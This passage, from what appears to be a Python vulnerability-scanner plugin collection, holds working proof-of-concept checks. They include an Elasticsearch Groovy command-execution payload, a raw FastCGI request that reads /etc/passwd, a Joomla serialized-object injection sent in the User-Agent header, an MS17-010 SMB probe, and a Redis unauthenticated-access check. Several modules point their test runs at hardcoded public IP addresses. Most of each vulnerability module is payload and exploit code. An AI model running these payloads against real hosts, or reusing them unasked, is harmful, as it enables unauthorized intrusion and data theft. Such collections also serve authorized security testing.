147 | parser.add_argument('-url', help='the target url.')
148 | parser.add_argument('-step', help='check|getshell')
149 | args = parser.parse_args()
150 | args_dict = args.__dict__
151 | plg = WavsPlugin()
152 |
153 | try:
154 | if not (args_dict['url'] == None):
155 | url = args_dict['url']
156 | if not (args_dict['step'] == None):
157 | step = args_dict['step']
158 |
159 | plg.cmd_run(url,step)
160 | else:
161 | print parser.print_usage()
162 | exit(0)
163 | except Exception,e:
164 | print parser.print_usage()
165 | exit(-1)
--------------------------------------------------------------------------------
/component/docker/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/elasticsearch/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['elasticsearch', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | return False
--------------------------------------------------------------------------------
/component/elasticsearch/elasticsearch_groovy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import requests,urllib2,json,urlparse
5 | class P(T):
6 | def __init__(self):
7 | T.__init__(self)
8 | vulID = '1708' # vul ID
9 | version = '1'
10 |
11 | vulDate = '2015-03-04'
12 | createDate = '2015-03-04'
13 | updateDate = '2015-03-04'
14 | references = ['http://bobao.360.cn/learning/detail/275.html']
15 | name = 'elasticsearch v1.43 _search 命令执行漏洞 POC'
16 | appPowerLink = 'http://www.elasticsearch.org'
17 | appName = 'elasticsearch'
18 | appVersion = 'v1.43'
19 | vulType = 'Command Execution'
20 | desc = '''
21 | 脚本查询模块,由于搜索引擎支持使用脚本代码作为表达式进行数据操作,攻击
22 | 者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy,并且
23 | 加入了沙盒进行控制,由于沙盒限制的不严格,导致远程代码执行
24 | '''
25 | def CVE20151427(self,url):
26 | req=None
27 | content=None
28 | try:
29 | target_url = "http://"+url+":9200/_search"
30 | payload = '{"size": 1,"script_fields": {"secpulse": {"script":' \
31 | ' "java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"COMMAND\\\")","lang": "groovy"}}}'
32 | req = urllib2.urlopen(target_url,data=payload,timeout=2)
33 | content = req.read()
34 | except Exception,e:
35 | content = e
36 | finally:
37 |
38 | if req:
39 | req.close()
40 | del req
41 | return content
42 |
43 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
44 |
45 | result = {}
46 | content_2 = self.CVE20151427(ip)
47 |
48 | result['result']=False
49 | if 'Cannot run program \\\\\\\"COMMAND\\\\\\\"' in content_2:
50 |
51 | result['result']=True
52 | result['VerifyInfo'] = {}
53 | result['VerifyInfo']['type']='Command Execution'
54 | result['VerifyInfo']['URL'] =ip+":9200/_search"
55 | result['VerifyInfo']['payload'] = '{"size": 1,"script_fields": {"secpulse": {"script":' \
56 | ' "java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"COMMAND\\\")","lang": "groovy"}}}'
57 |
58 | return result
59 | if __name__ == '__main__':
60 |
61 | print P().verify(ip='42.120.7.130',port='9200')
62 |
63 |
--------------------------------------------------------------------------------
/component/elasticsearch/elasticsearch_nodestate.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import requests,urllib2,json,urlparse
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 | target_url = "http://"+ip+":9200/_nodes/stats"
11 | result = {}
12 | result['result']=False
13 | r=None
14 | try:
15 | r=requests.get(url=target_url,timeout=2)
16 | if r.status_code==200:
17 | result['result']=True
18 | result['VerifyInfo'] = {}
19 | result['VerifyInfo']['type']='information unclosed'
20 | result['VerifyInfo']['URL'] =ip+":9200/_nodes/stats"
21 | result['VerifyInfo']['payload']='IP:9200/_nodes/stats'
22 | result['VerifyInfo']['result'] =r.text
23 | else:
24 | pass
25 | except Exception,e:
26 | print e.text
27 | finally:
28 | if r is not None:
29 | r.close()
30 | del r
31 | return result
32 | if __name__ == '__main__':
33 | print P().verify(ip='42.120.7.120',port='9200')
34 |
--------------------------------------------------------------------------------
/component/elasticsearch/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/fast_cgi/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['fast-cgi', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if port=='9000':
4 | return True
5 | else:
6 | return False
--------------------------------------------------------------------------------
/component/fast_cgi/fast_cgi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import socket
6 |
7 |
8 | class P(T):
9 | def __init__(self):
10 | T.__init__(self)
11 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
12 | timeout=3
13 |
14 |
15 |
16 | result = {}
17 | result['result']=False
18 |
19 |
20 | target_url='http://'+ip+':'+port
21 | socket.setdefaulttimeout(timeout)
22 | client_socket=None
23 | # 测试是否有leak
24 | try:
25 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
26 | client_socket.connect((ip, 9000))
27 | data = """
28 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
29 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
30 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
31 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
32 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
33 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
34 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
35 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
36 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
37 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
38 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
39 | """
40 | data_s = ''
41 | for _ in data.split():
42 | data_s += chr(int(_, 16))
43 | client_socket.send(data_s)
44 | ret = client_socket.recv(1024)
45 |
46 | if ret.find(':root:') > 0:
47 | result['result']=True
48 | result['VerifyInfo'] = {}
49 | result['VerifyInfo']['type']='fast-cgi Vulnerability'
50 | result['VerifyInfo']['URL'] =target_url
51 | result['VerifyInfo']['payload']=data_s
52 | result['VerifyInfo']['result'] =ret
53 |
54 |
55 | except:
56 | pass
57 |
58 | finally:
59 | if client_socket is not None:
60 | client_socket.close()
61 |
62 | return result
63 |
64 |
65 |
66 |
67 |
68 |
69 | if __name__ == '__main__':
70 | print P().verify(ip='58.220.22.101',port='80')
--------------------------------------------------------------------------------
/component/fast_cgi/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/joomla/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['joomla', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'joomla' in context or 'joomla' in hackinfo:
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/joomla/joomla_unrec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import urllib2
5 | import cookielib
6 |
7 |
8 | import pexpect
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 |
15 | result = {}
16 | result['result']=False
17 | target_url = "http://"+ip+":"+port
18 |
19 | i=0
20 | req=None
21 | try:
22 |
23 | cj = cookielib.CookieJar()
24 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
25 | urllib2.install_opener(opener)
26 | urllib2.socket.setdefaulttimeout(10)
27 |
28 | ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
29 |
30 | req = urllib2.Request(url=target_url, headers={'User-Agent': ua})
31 | opener.open(req)
32 | req = urllib2.Request(url=target_url)
33 | if 'SERVER["REMOTE_ADDR"]' in opener.open(req).read():
34 |
35 |
36 | result['result'] = True
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['type'] = 'joomla unrec'
39 | result['VerifyInfo']['URL'] = ip + ':' + port
40 | result['VerifyInfo']['payload'] = ua
41 |
42 |
43 | except Exception,e:
44 | pass
45 |
46 | finally:
47 | if req is not None:
48 | del req
49 | return result
50 | if __name__ == '__main__':
51 | print P().verify(ip='119.90.40.147',port='8081')
52 |
--------------------------------------------------------------------------------
/component/joomla/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/openssl/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['heartblede', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if int(port) in [443,587,465,995,8443] or productname.get('protocol','') in ['https','smtp','pop','imap','https-alt']:
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/openssl/heartbleed.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import os
5 | import platform
6 | import subprocess
7 | import signal
8 | import time
9 | import requests,urllib2,json,urlparse
10 |
11 | class TimeoutError(Exception):
12 | pass
13 | def command(cmd, timeout=60):
14 | """Run command and return the output
15 | cmd - the command to run
16 | timeout - max seconds to wait for
17 | """
18 | is_linux = platform.system() == 'Linux'
19 |
20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
21 | if timeout==0:
22 | return p.stdout.read()
23 | t_beginning = time.time()
24 | seconds_passed = 0
25 | while True:
26 | if p.poll() is not None:
27 | break
28 | seconds_passed = time.time() - t_beginning
29 | if timeout and seconds_passed > timeout:
30 | if is_linux:
31 | os.killpg(p.pid, signal.SIGTERM)
32 | else:
33 | p.terminate()
34 | raise TimeoutError(cmd, timeout)
35 | time.sleep(0.1)
36 | return p.stdout.read()
37 | class P(T):
38 | def __init__(self):
39 | T.__init__(self)
40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
41 |
42 | result = {}
43 | result['result']=False
44 | r=None
45 |
46 | usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/heartbleedpoc.py '+ip+' -p '+port
47 | try:
48 | msgresult = command(usecommand, timeout=3)
49 | print msgresult
50 | if 'find vulnerability' in msgresult:
51 | result['result']=True
52 | result['VerifyInfo'] = {}
53 | result['VerifyInfo']['type']='heartbleed vul'
54 | result['VerifyInfo']['URL'] =ip+':'+port
55 | result['VerifyInfo']['payload']='heartbleedpoc'
56 | result['VerifyInfo']['result'] =msgresult
57 | else:
58 | pass
59 | except Exception,e:
60 | print e.text
61 | finally:
62 | if r is not None:
63 | r.close()
64 | return result
65 | if __name__ == '__main__':
66 | print P().verify(ip='58.213.14.178',port='443')
67 |
--------------------------------------------------------------------------------
/component/openssl/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/redis/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['redis', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if int(port) in [6379] or productname.get('protocol','') in ['redis']:
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/redis/redis_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import socket
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 |
15 | result = {}
16 | result['result']=False
17 | s=None
18 |
19 |
20 | try:
21 |
22 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
23 | s = socket.socket()
24 | socket.setdefaulttimeout(10)
25 |
26 |
27 | s.connect((ip, int(port)))
28 | s.send(payload)
29 | recvdata = s.recv(1024)
30 | if recvdata and 'redis_version' in recvdata:
31 | result['result'] = True
32 | result['VerifyInfo'] = {}
33 | result['VerifyInfo']['type'] = 'redis unauth access vul'
34 | result['VerifyInfo']['URL'] = ip
35 | result['VerifyInfo']['Port'] = port
36 |
37 | result['VerifyInfo']['result'] = recvdata
38 |
39 |
40 | except Exception,e:
41 | print e.text
42 | finally:
43 | if s is not None:
44 | s.close()
45 | return result
46 | if __name__ == '__main__':
47 | # print P().verify(ip='61.146.115.83',port='81')
48 | print P().verify(ip='121.41.28.130', port='7002')
49 |
--------------------------------------------------------------------------------
/component/redis/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/smb/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['smb', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if int(port) in [445] :
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/smb/ms17_010.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | #author:wolf@YSRC
4 | #url:http://bobao.360.cn/learning/detail/3738.html
5 | from t import T
6 | import socket
7 | import binascii
8 |
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 |
16 | result = {}
17 | result['result']=False
18 |
19 |
20 | try:
21 |
22 | label=self.check(ip,port,timeout=3000)
23 | if label:
24 | result['result'] = True
25 | result['VerifyInfo'] = {}
26 | result['VerifyInfo']['type'] = 'remote command execute'
27 | result['VerifyInfo']['URL'] = ip
28 | result['VerifyInfo']['Port'] = port
29 |
30 | result['VerifyInfo']['result'] = "NSA Eternalblue SMB,SMB远程溢出"
31 |
32 |
33 | except Exception,e:
34 | print e.text
35 | finally:
36 |
37 | return result
38 |
39 | def get_tree_connect_request(self,ip, tree_id):
40 | ipc = "005c5c" + binascii.hexlify(ip) + "5c49504324003f3f3f3f3f00"
41 | ipc_len_hex = hex(len(ipc) / 2).replace("0x", "")
42 | smb = "ff534d4275000000001801280000000000000000000000000000729c" + binascii.hexlify(
43 | tree_id) + "c4e104ff00000000000100" + ipc_len_hex + "00" + ipc
44 | tree = "000000" + hex(len(smb) / 2).replace("0x", "") + smb
45 | tree_connect_request = binascii.unhexlify(tree)
46 | return tree_connect_request
47 |
48 | def check(self,ip, port, timeout):
49 | negotiate_protocol_request = binascii.unhexlify(
50 | "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200")
51 | session_setup_request = binascii.unhexlify(
52 | "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff0200010000000000310000000000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e505974624955473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
53 | try:
54 | s=None
55 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
56 | s.settimeout(timeout)
57 | s.connect((ip, port))
58 | s.send(negotiate_protocol_request)
59 | s.recv(1024)
60 | s.send(session_setup_request)
61 | data = s.recv(1024)
62 | user_id = data[32:34]
63 | session_setup_request_2 = binascii.unhexlify(
64 | "00000150ff534d4273000000001801280000000000000000000000000000729c" + binascii.hexlify(
65 | user_id) + "c4e10cff000000dfff0200010000000000f200000000005cd0008015014e544c4d53535000030000001800180040000000780078005800000002000200d000000000000000d200000020002000d200000000000000f2000000050208a2ec893eacfc70bba9afefe94ef78908d37597e0202fd6177c0dfa65ed233b731faf86b02110137dc50101000000000000004724eed7b8d2017597e0202fd6177c0000000002000a0056004b002d005000430001000a0056004b002d005000430004000a0056004b002d005000430003000a0056004b002d00500043000700080036494bf1d7b8d20100000000000000002e003400310042006c007400410031004e005000590074006200490055004700300057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
66 | s.send(session_setup_request_2)
67 | s.recv(1024)
68 | session_setup_request_3 = binascii.unhexlify(
69 | "00000063ff534d4273000000001801200000000000000000000000000000729c0000c4e10dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000")
70 | s.send(session_setup_request_3)
71 | data = s.recv(1024)
72 | tree_id = data[32:34]
73 | smb = self.get_tree_connect_request(ip, tree_id)
74 | s.send(smb)
75 | s.recv(1024)
76 | poc = binascii.unhexlify(
77 | "0000004aff534d422500000000180128000000000000000000000000" + binascii.hexlify(
78 | user_id) + "729c" + binascii.hexlify(
79 | tree_id) + "c4e11000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
80 | s.send(poc)
81 | data = s.recv(1024)
82 | if "\x05\x02\x00\xc0" in data:
83 | return True
84 | return False
85 | except:
86 | return False
87 | finally:
88 | if s is not None:
89 | s.close()
90 | if __name__ == '__main__':
91 | # print P().verify(ip='61.146.115.83',port='81')
92 | print P().verify(ip='121.41.28.130', port='445')
93 |
--------------------------------------------------------------------------------
/component/smb/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/struts/__init__.py:
--------------------------------------------------------------------------------
1 |
2 | KEYWORDS = ['struts', ]
3 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
4 | if 'struts2' in context or '.action' in context or '.do' in context:
5 | return True
6 | else:
7 |
8 | return False
9 |
10 |
11 |
--------------------------------------------------------------------------------
/component/struts/script/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/struts/script/__init__.py
--------------------------------------------------------------------------------
/component/struts/script/linktool.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | import urlparse
4 | import re
5 | from bs4 import BeautifulSoup
6 |
7 | """
8 | BeautifulSoup:
9 | encoding error : input conversion failed due to input error, bytes 0x9E 0x65 0xBA 0xD3
10 | """
11 | def format_html(html,charset=''):
12 | def get_charset(html):
13 | if html[0:3] == '\xef\xbb\xbf':
14 | return 'UTF-8'
15 | match = re.search('', html, re.IGNORECASE)
16 | if match:
17 | return match.group(1)
18 | return 'GB18030'
19 |
20 | def convert_to_unicode(content):
21 | if isinstance(content, str):
22 | try:
23 | return force_convert_cn(content)
24 | except UnicodeDecodeError as e:
25 | print(e)
26 | return content
27 |
28 | def force_convert_cn(content,charset=''):
29 | if not charset == '':
30 | return content.decode(charset, 'ignore')
31 | try_list = ["UTF-8", "GB18030", "BIG5"]
32 | for codec in try_list:
33 | try:
34 | decoded = content.decode(codec)
35 | return decoded
36 | except UnicodeDecodeError as e:
37 | continue
38 | charset = get_charset(content)
39 | decoded = content.decode(charset, 'ignore')
40 | return decoded
41 |
42 | def html_entity_decode(html):
43 | try:
44 | import HTMLParser
45 | parser = HTMLParser.HTMLParser()
46 | return parser.unescape(html)
47 | except:
48 | return html
49 |
50 | #html = html_entity_decode(html)
51 | html = convert_to_unicode(html)
52 | return html
53 |
54 | class LinksParser(object):
55 | """docstring for link_parser"""
56 | def __init__(self, baseurl, html_content):
57 | super(LinksParser, self).__init__()
58 | self.weburl = self.baseurl = baseurl
59 | self.html_content = format_html(html_content)
60 | self.url_links = {
61 | 'a':[],
62 | 'link':[],
63 | 'img':[],
64 | 'script':[],
65 | 'form':[],
66 | 'location':[],
67 | }
68 | self.external_links = []
69 | self.internal_links = []
70 | self.soup = BeautifulSoup(self.html_content, 'lxml')
71 | self.get_baseurl()
72 |
73 | def get_baseurl(self):
74 | tag = self.soup.find('base')
75 | if tag and tag.attrs.has_key('href'):
76 | if not urlparse.urlparse(tag.attrs['href']).netloc == '':
77 | self.baseurl = tag.attrs['href']
78 | return self.baseurl
79 |
80 | def complet_url(self, link):
81 | if link.startswith('/') or link.startswith('.'):
82 | return urlparse.urljoin(self.baseurl, link)
83 | elif link.startswith('http') or link.startswith('https'):
84 | return link
85 | else:
86 | return urlparse.urljoin(self.baseurl, link)
87 | #return False
88 |
89 | def getall(self):
90 | self.get_tag_a()
91 | self.get_tag_link()
92 | self.get_tag_img()
93 | self.get_tag_script()
94 | self.get_tag_form()
95 | self.get_tag_location()
96 | # links 去重
97 | for child in self.url_links.keys():
98 | self.url_links[child] = list(set(self.url_links[child]))
99 | return self.url_links
100 |
101 | def get_tag_a(self):
102 | # 处理A链接
103 | for tag in self.soup.find_all('a'):
104 | if tag.attrs.has_key('href'):
105 | link = tag.attrs['href']
106 | # link = urlparse.urldefrag(tag.attrs['href'])[0] # 处理掉#tag标签信息
107 | complet_link = self.complet_url(link.strip())
108 | if complet_link:
109 | self.url_links['a'].append(complet_link)
110 | return self.url_links
111 |
112 | def get_tag_link(self):
113 | # 处理link链接资源
114 | for tag in self.soup.find_all('link'):
115 | if tag.attrs.has_key('href'):
116 | link = tag.attrs['href']
117 | complet_link = self.complet_url(link.strip())
118 | if complet_link:
119 | self.url_links['link'].append(complet_link)
120 | return self.url_links
121 |
122 | def get_tag_img(self):
123 | for tag in self.soup.find_all('img'):
124 | if tag.attrs.has_key('src'):
125 | link = tag.attrs['src']
126 | complet_link = self.complet_url(link.strip())
127 | if complet_link:
128 | self.url_links['img'].append(complet_link)
129 | return self.url_links
130 |
131 | def get_tag_script(self):
132 | for tag in self.soup.find_all('script'):
133 | if tag.attrs.has_key('src'):
134 | link = tag.attrs['src']
135 | complet_link = self.complet_url(link.strip())
136 | if complet_link:
137 | self.url_links['script'].append(complet_link)
138 | return self.url_links
139 |
140 | def get_tag_location(self):
141 | for tag in self.soup.find_all('script'):
142 | text = tag.get_text()
143 | match = re.search('location(\.href)?\s*?=\s*?[\'"](.*?)[\'"]',text,re.IGNORECASE)
144 | if match:
145 | link = match.group(2)
146 | complet_link = self.complet_url(link.strip())
147 | if complet_link:
148 | self.url_links['location'].append(complet_link)
149 | return self.url_links
150 |
151 | def get_tag_form(self):
152 | for tag in self.soup.find_all('form'):
153 | if tag.attrs.has_key('action'):
154 | link = tag.attrs['action']
155 | complet_link = self.complet_url(link.strip())
156 | if complet_link:
157 | self.url_links['form'].append(complet_link)
158 | return self.url_links
159 |
160 | def get_links_internal(self):
161 | b = self.getall()
162 | for a in b:
163 | for i in b[a]:
164 | p = urlparse.urlparse(i)
165 | if p.netloc == urlparse.urlparse(self.weburl).netloc:
166 | self.internal_links.append(i)
167 | else:
168 | continue
169 | return self.internal_links
170 |
171 | def get_links_external(self):
172 | for i in self.getall()['a']:
173 | p = urlparse.urlparse(i)
174 | if p.netloc == urlparse.urlparse(self.weburl).netloc:
175 | continue
